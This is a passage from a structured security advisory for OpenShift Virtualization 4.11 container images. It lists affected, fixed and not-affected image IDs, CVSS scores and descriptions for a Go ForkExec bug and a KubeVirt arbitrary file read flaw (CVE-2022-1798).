"2022-09-14T19:28:51+00:00", details: "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2022:6526", }, { category: "workaround", details: "This bug can be mitigated by raising the per-process file descriptor limit.", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 4.8, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", version: "3.1", }, products: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: syscall: don't close fd 0 on ForkExec error", }, { acknowledgments: [ { names: [ "Oliver Brooks and James Klopchic", ], organization: "NCC Group", }, ], cve: "CVE-2022-1798", cwe: { id: "CWE-22", name: "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", }, discovery_date: "2022-08-12T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2117872", }, ], notes: [ { category: "description", text: "An arbitrary file read vulnerability was found in the kubeVirt API. This flaw makes it possible to use the kubeVirt API to provide access to host files (like /etc/passwd, for example) in a KubeVirt VM as a disk device that can be written to and read from.", title: "Vulnerability description", }, { category: "summary", text: "kubeVirt: Arbitrary file read on the host from KubeVirt VMs", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", ], known_not_affected: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", 